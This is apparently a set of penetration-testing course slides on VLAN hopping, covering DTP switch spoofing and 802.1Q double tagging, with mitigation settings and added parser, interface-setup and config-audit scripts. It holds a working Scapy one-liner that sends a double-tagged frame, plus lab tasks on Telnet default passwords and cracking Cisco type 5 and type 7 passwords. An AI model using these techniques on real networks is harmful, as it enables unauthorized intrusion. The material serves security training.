○ Primarily for isolation
○ Security
○ Flexibility
○ Traffic load balancing / decreased latency
● Massive scope: a single error can break the isolation
● Learn the VLAN basics to understand VLANs better:
○ Trunking
○ 802.1Q tagging
○ Virtual interfaces
VLAN: Trunking
VLAN: 802.1Q Tagging
● 802.1Q tagging (IEEE standard)
○ 4-byte tag (2 bytes TPID + 2 bytes TCI)
○ Inserted into the frame
● ISL encapsulation (Inter-Switch Link, by Cisco)
● SVI (Switch Virtual Interface)
○ Allows traffic routing between VLANs via a default gateway
○ Supports bridging configuration and routing protocols
VLAN: Protocols in Use
● CDP - Cisco Discovery Protocol
○ Used by Cisco devices to communicate with neighbours
○ CDP announcements broadcast over VLAN 1 are interesting!
● STP - Spanning Tree Protocol
○ Builds network topology with focus on loop avoidance
● DTP - Dynamic Trunking Protocol
○ When you want to dynamically configure trunks on each switch port
○ Switch port modes: Access, Trunk, Dynamic Auto, Dynamic Desirable
● VTP - VLAN Trunking Protocol
○ Used to Transmit VLAN Information and help with autoconfiguration
○ Broadcast on VLAN 1
VLAN: Concepts
● DTP negotiates the interface mode dynamically based on the port modes
● Generally used for ports connecting two switches
● Dynamic Auto is the default in newer Cisco IOS, whereas Dynamic Desirable was the default in older revisions
Dynamic Desirable + Dynamic Auto      = Trunk
Dynamic Desirable + Dynamic Desirable = Trunk
Dynamic Desirable + Trunk             = Trunk
Dynamic Desirable + Access            = Access
Dynamic Auto + Dynamic Auto           = Access
Dynamic Auto + Dynamic Desirable      = Trunk
Dynamic Auto + Trunk                  = Trunk
Dynamic Auto + Access                 = Access
● Unauthenticated protocol: anyone can send false DTP packets
VLAN: Hopping
● Attacking a network with multiple VLANs
● It is directed at trunking encapsulation protocols (802.1Q/ISL)
Two attacks:
○ Switch spoofing: mimic a switch (inject DTP packets, negotiate with the switch to act as an 802.1Q trunk)
○ Double tagging: the frame is forwarded to the wrong VLAN; the switch strips the first (outer) tag and forwards it to the target VLAN, as defined within the second (inner) tag
Double Tagging : Example
● Two VLANs: 1 and 20
● VLAN 1 is the native VLAN
● All computer ports are access ports
● Attack video
https://youtu.be/bbuYKughzS8
● Scapy one-liner
sendp(Ether(dst='ff:ff:ff:ff:ff:ff', src='c2:db:bd:5d:bf:02')/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='10.0.20.11', src='10.0.1.11')/ICMP())
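An added example for the 802.1Q tagging slide and the double-tagging example above (not code from the course material or from Scapy): it builds tagged frames in the same layout as the Scapy one-liner without sending anything, parses the 4-byte tags (TPID + TCI) back out, and applies the check a capture-side detector would use to flag a frame whose outer tag is the native VLAN and whose inner tag names another VLAN. The MAC addresses are the ones from the slide; the IP payload is a placeholder.

```python
"""Build and parse 802.1Q-tagged Ethernet frames, and spot the double-tagged
frame used in the VLAN hopping example above.

Added example, not part of the course material: parse_frame() walks the
Ethernet header and each 4-byte tag (2-byte TPID, 2-byte TCI: 3-bit PCP,
1-bit DEI, 12-bit VID) exactly as described on the 802.1Q slide;
build_frame() constructs test frames in the same layout as the Scapy
one-liner (constructed here, no packets are sent); is_hopping_frame()
is the check a capture-side detector would run for frames whose outer
tag is the native VLAN and whose inner tag names another VLAN."""
import struct

TPIDS = {0x8100: "802.1Q", 0x88A8: "802.1ad (S-tag)"}


def build_frame(dst: bytes, src: bytes, vlan_ids, ethertype: int, payload: bytes) -> bytes:
    """Constructed frame: dst/src MACs, one 0x8100 tag per VLAN ID, EtherType, payload."""
    frame = dst + src
    for vid in vlan_ids:
        tci = (0 << 13) | (0 << 12) | (vid & 0x0FFF)  # PCP=0, DEI=0, VID
        frame += struct.pack("!HH", 0x8100, tci)
    return frame + struct.pack("!H", ethertype) + payload


def parse_frame(frame: bytes) -> dict:
    """Return MACs, the list of VLAN tags (outer first), EtherType and payload."""
    if len(frame) < 14:
        raise ValueError("truncated Ethernet header")
    dst, src = frame[:6], frame[6:12]
    offset, tags = 12, []
    while True:
        if offset + 2 > len(frame):
            raise ValueError("truncated frame")
        (etype,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        if etype not in TPIDS:
            break  # not a tag: this is the real EtherType
        if offset + 2 > len(frame):
            raise ValueError("truncated VLAN tag")
        (tci,) = struct.unpack_from("!H", frame, offset)
        offset += 2
        tags.append({"tpid": etype, "pcp": tci >> 13,
                     "dei": (tci >> 12) & 1, "vid": tci & 0x0FFF})
    return {
        "dst": dst.hex(":"), "src": src.hex(":"),
        "tags": tags, "vlans": [t["vid"] for t in tags],
        "ethertype": etype, "payload": frame[offset:],
        "double_tagged": len(tags) >= 2,
    }


def is_hopping_frame(frame: bytes, native_vlan: int = 1) -> bool:
    """True when the outer tag is the native VLAN (the one the first switch
    strips) and an inner tag targets a different VLAN."""
    vlans = parse_frame(frame)["vlans"]
    return len(vlans) >= 2 and vlans[0] == native_vlan and vlans[1] != native_vlan


# Constructed frames mirroring the Scapy example: VLAN 1 (native) outer, VLAN 20 inner.
BROADCAST = bytes.fromhex("ffffffffffff")
SRC_MAC = bytes.fromhex("c2dbbd5dbf02")
PLACEHOLDER_IP = b"\x45\x00" + b"\x00" * 18  # stand-in for an IPv4 header, not a real packet
DOUBLE_TAGGED = build_frame(BROADCAST, SRC_MAC, [1, 20], 0x0800, PLACEHOLDER_IP)
UNTAGGED = build_frame(BROADCAST, SRC_MAC, [], 0x0806, b"\x00" * 28)

if __name__ == "__main__":
    for name, f in (("double-tagged", DOUBLE_TAGGED), ("untagged", UNTAGGED)):
        p = parse_frame(f)
        print(name, p["vlans"], hex(p["ethertype"]), "hopping:", is_hopping_frame(f))
```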
Switch Spoofing
● Attack by mimicking a Switch
● Leverage issues with DTP configuration to gain trunk port
switchport mode     | trunk | dynamic desirable | dynamic auto | access
trunk               | Yes   | Yes               | Yes          | No
dynamic desirable   | Yes   | Yes               | Yes          | No
dynamic auto        | Yes   | Yes               | No           | No
access              | No    | No                | No           | No
(Yes = a trunk link forms between the two port modes)
VLAN Hopping: Attack
● Collect information:
○ VLAN IDs
○ IP addresses (gateways, hosts, anything!)
○ Keep sniffing!
● Toolset:
○ Yersinia (Kali has it!)
○ Sniffers
○ arp-scan
VLAN: Attacks
● After negotiating a trunk link you can identify VLAN IDs and add VLAN interfaces on your host to target these ranges
● Once successful, an easy approach is to perform ARP sweeps / ping broadcast addresses to find live hosts on the target VLAN
● If there are any hosts, go for pwnage!
● If there are any devices, go for known service (Telnet, HTTP) weaknesses first, then explore further!
● It's effectively an open door to the whole of the network!
VLAN: Challenges
● A number of challenges relate to topics we have covered during
these slides
● A few challenges relate to device configuration weaknesses i.e.
switch/router configurations
● This will cover:
○ Weak passwords (Cisco type7 and ‘secret’ passwords)
○ Cracking device passwords
Uncommon Sense
● In order to analyse traffic, we need to ensure our interface is up and running and all the necessary modules are loaded
# ip link
● If you see the LOWER_UP flag, the link is connected. Output example:
root@kali:~# ip link
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN mode DEFAULT link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UNKNOWN mode DEFAULT qlen 1000 link/ether 00:50:56:9f:29:9e brd ff:ff:ff:ff:ff:ff
● To load the 8021q module, run this command:
# modprobe 8021q
● There are multiple ways to sniff; use whichever method gives you the most info
Exercise | Demo 10.1
● Identify the protocols being broadcast by the switch/routing device on the network
● Observe the traffic, and then answer the following questions:
○ Device name
○ Platform details
○ Software version
● Find the management domain name and IP address from the device traffic
● Discover all of the VLAN IDs on the network
● Find all of the live hosts in the VLANs lower than ID 100 (PS. The 3rd octet in the IP address
relates to the VLAN ID. For example, 10.10.100.210 means it’s a host in VLAN 100. This is a common
naming notation for tagged traffic in the real world)
Useful Tips
For the upcoming exercise, you will need to understand the following:
○ For every VLAN, the VLAN ID is used as the third octet of the network. For example, for VLAN
100, you will use the network range 10.10.100.0/24.
○ When you assign a static IP to the interface on your Kali host, please assign a
static IP corresponding to your user ID. For example, if I am user20, I will use
10.10.100.20 as my static IP address.
In effect, once I have added a virtual interface for VLAN 100, my static IP will
be 10.10.100.20, where 100 is the VLAN ID and 20 is my user ID
Any doubts? Please reach out for assistance
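The Uncommon Sense and Useful Tips slides describe one procedure: confirm the parent link has LOWER_UP, load 8021q, add a tagged sub-interface and give it the 10.10.<VLAN ID>.<user ID> address. The script below is an added example that is not part of the course material; it assumes the parent interface name, VLAN ID and user ID are passed as arguments (eth1, 100 and 20 in the usage line are illustrative values only) and refuses to tag an interface that has no carrier or values that are out of range.

```shell
#!/bin/sh
# Added example, not from the course slides: check that the parent link has carrier
# (LOWER_UP), load the 8021q module if needed, then add a tagged sub-interface
# addressed as 10.10.<VLAN ID>.<user ID>/24 as the Useful Tips slide describes.
# Assumptions: the parent interface name, VLAN ID and user ID are passed as
# arguments; eth1/100/20 in the usage line are illustrative values only.

# link_is_up IFACE IPLINK_OUTPUT
# Return 0 when IFACE's line in the given `ip link` output carries LOWER_UP.
link_is_up() {
    printf '%s\n' "$2" | grep -E "^[0-9]+: $1: <[^>]*LOWER_UP[^>]*>" >/dev/null
}

# vlan_addr VLAN_ID USER_ID
# Print 10.10.<vlan>.<user>/24 after checking both values are in range.
vlan_addr() {
    vlan=$1; user=$2
    [ "$vlan" -ge 1 ] && [ "$vlan" -le 4094 ] || { echo "bad VLAN ID: $vlan" >&2; return 1; }
    [ "$user" -ge 1 ] && [ "$user" -le 254 ] || { echo "bad user ID: $user" >&2; return 1; }
    printf '10.10.%s.%s/24\n' "$vlan" "$user"
}

# add_vlan_iface PARENT VLAN_ID USER_ID
# Create PARENT.VLAN_ID, assign the static address and bring it up (needs root).
add_vlan_iface() {
    parent=$1; vlan=$2; user=$3
    addr=$(vlan_addr "$vlan" "$user") || return 1
    if ! link_is_up "$parent" "$(ip link)"; then
        echo "$parent has no LOWER_UP flag: check cabling / VM network before tagging" >&2
        return 1
    fi
    # 802.1Q tagging lives in the 8021q module; load it only if it is not already in
    lsmod | grep -q '^8021q' || modprobe 8021q
    ip link add link "$parent" name "$parent.$vlan" type vlan id "$vlan"
    ip addr add "$addr" dev "$parent.$vlan"
    ip link set "$parent.$vlan" up
    echo "$parent.$vlan is up with $addr"
}

# Usage (as root): sh vlan_iface.sh eth1 100 20
if [ "$(id -u)" -eq 0 ] && [ $# -eq 3 ]; then
    add_vlan_iface "$@"
fi
```

The carrier check matters in the lab: a sub-interface on a parent without LOWER_UP comes up cleanly but never sees a frame, which is easy to mistake for an empty VLAN.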
Exercise | Demo 10.2
You will have already identified an IP address of a device on VLAN ID 100. Continuing
with this attack, perform the following tasks:
• Find the IP address of another device on VLAN 100 (hint - ARP!)
• Gain Telnet access to the second device (if you are connecting to the right device,
you will be able to ping the IP and read its custom Telnet banner. Another hint is
that its IP address is greater than 10.10.100.200)
• Gain ‘enable’ access to the device. You’ll need to gain access to the Telnet interface
(a common/default password value) and then learn to crack Cisco ‘secret’/type 5
and type 7 passwords
VLAN: The Network
VLAN: Attack Mitigation
● Example: access mode
#switchport mode access
#switchport nonegotiate
#switchport access vlan 100
● Example: trunk mode
#switchport trunk encapsulation dot1q
#switchport mode trunk
#switchport nonegotiate
#switchport trunk allowed vlan 10,100
#switchport trunk native vlan 1
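The mitigation slide above lists the settings that close the trunk-negotiation door (an explicit mode, switchport nonegotiate, a restricted allowed-VLAN list), and the Challenges slide names the password weaknesses (type 7 and ‘secret’ passwords). The script below is an added example, not part of the course material, that audits an IOS-style running config for the absence of exactly those settings. It assumes one-space indented interface stanzas terminated by "!" as on the slide; SAMPLE_CONFIG is constructed for the demo and its hash values are placeholders.

```shell
#!/bin/sh
# Added example, not from the course slides: audit an IOS-style running config
# for ports that still allow DTP negotiation, trunks that carry every VLAN, and
# password lines stored reversibly (type 7) or as crackable type 5 secrets.
# Assumptions: one-space indented interface stanzas terminated by "!" as on the
# mitigation slide; SAMPLE_CONFIG below is constructed, with placeholder hashes.

SAMPLE_CONFIG='hostname lab-sw1
!
enable secret 5 $1$PLACEHOLDER_TYPE5_HASH
username admin password 7 PLACEHOLDER_TYPE7
!
interface GigabitEthernet0/1
 switchport mode access
 switchport nonegotiate
 switchport access vlan 100
!
interface GigabitEthernet0/2
 switchport access vlan 100
!
interface GigabitEthernet0/3
 switchport trunk encapsulation dot1q
 switchport mode trunk
!
interface Vlan1
 ip address 10.10.1.1 255.255.255.0
!
line vty 0 4
 password 7 PLACEHOLDER_TYPE7
 login
!'

# audit_switchports: one finding per line for each interface that has switchport config
audit_switchports() {
    awk '
    function report() {
        if (name == "" || !sw) { name = ""; return }
        if (mode == "") mode = "unset"
        # no explicit mode, or a dynamic mode, leaves DTP free to negotiate a trunk
        if (mode == "unset" || mode ~ /^dynamic/)
            print name ": DTP negotiation possible (mode " mode "); set switchport mode access or trunk"
        if (!noneg)
            print name ": missing switchport nonegotiate"
        if (mode == "trunk" && allowed == "")
            print name ": trunk carries all VLANs; restrict with switchport trunk allowed vlan"
        name = ""
    }
    /^interface / { report(); name = $2; sw = 0; mode = ""; noneg = 0; allowed = ""; next }
    name != "" && /^ switchport/                    { sw = 1 }
    name != "" && /^ switchport mode /              { mode = $3 }
    name != "" && /^ switchport nonegotiate/        { noneg = 1 }
    name != "" && /^ switchport trunk allowed vlan/ { allowed = $5 }
    /^!/  { report() }
    END   { report() }
    '
}

# audit_passwords: flag password storage the slides call weak (type 7, enable password, type 5)
audit_passwords() {
    awk '
    /^enable password /  { print "enable password in use; replace with enable secret" }
    / password 7 /       { line = $0; sub(/^ +/, "", line); sub(/ 7 .*/, "", line)
                           print "type 7 (reversible) password: " line }
    /^enable secret 5 /  { print "enable secret is type 5 (MD5, crackable offline); use type 8/9 where supported" }
    '
}

# audit_config [FILE]: audit FILE, or the constructed sample when no file is given
audit_config() {
    cfg=$( if [ $# -ge 1 ]; then cat "$1"; else printf '%s\n' "$SAMPLE_CONFIG"; fi )
    printf '%s\n' "$cfg" | audit_switchports
    printf '%s\n' "$cfg" | audit_passwords
}

# Usage: sh audit_switch.sh [running-config.txt]
audit_config "$@"
```

Run against the sample, GigabitEthernet0/1 (configured as the slide shows) produces no finding, GigabitEthernet0/2 is reported for its unset mode and missing nonegotiate, GigabitEthernet0/3 for carrying every VLAN, and the two type 7 lines and the type 5 enable secret are listed. Note that `service password-encryption` only produces type 7, so it does not clear the type 7 findings.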
Network Status: After VLAN Exploitation
Online Lab: You Haven’t Finished Yet...
● Additional Challenges:
○ Using different tools/techniques to target IPv6 enabled hosts
○ Multiple ways to ‘land’ a shell and gain root access on the VoIP box
○ + Anything we may not have covered/had time for during this training!
○ MySQL and PostgreSQL on 192.168.3.100
● Root Access pending on:
○ 192.168.3.100 (Oracle)
○ 192.168.3.180 (Heartbleed + ShellShock)
○ 192.168.3.208 (Jenkins)
○ 192.168.3.210 (VPN)
feedback/contact
aih2training@notsosecure.com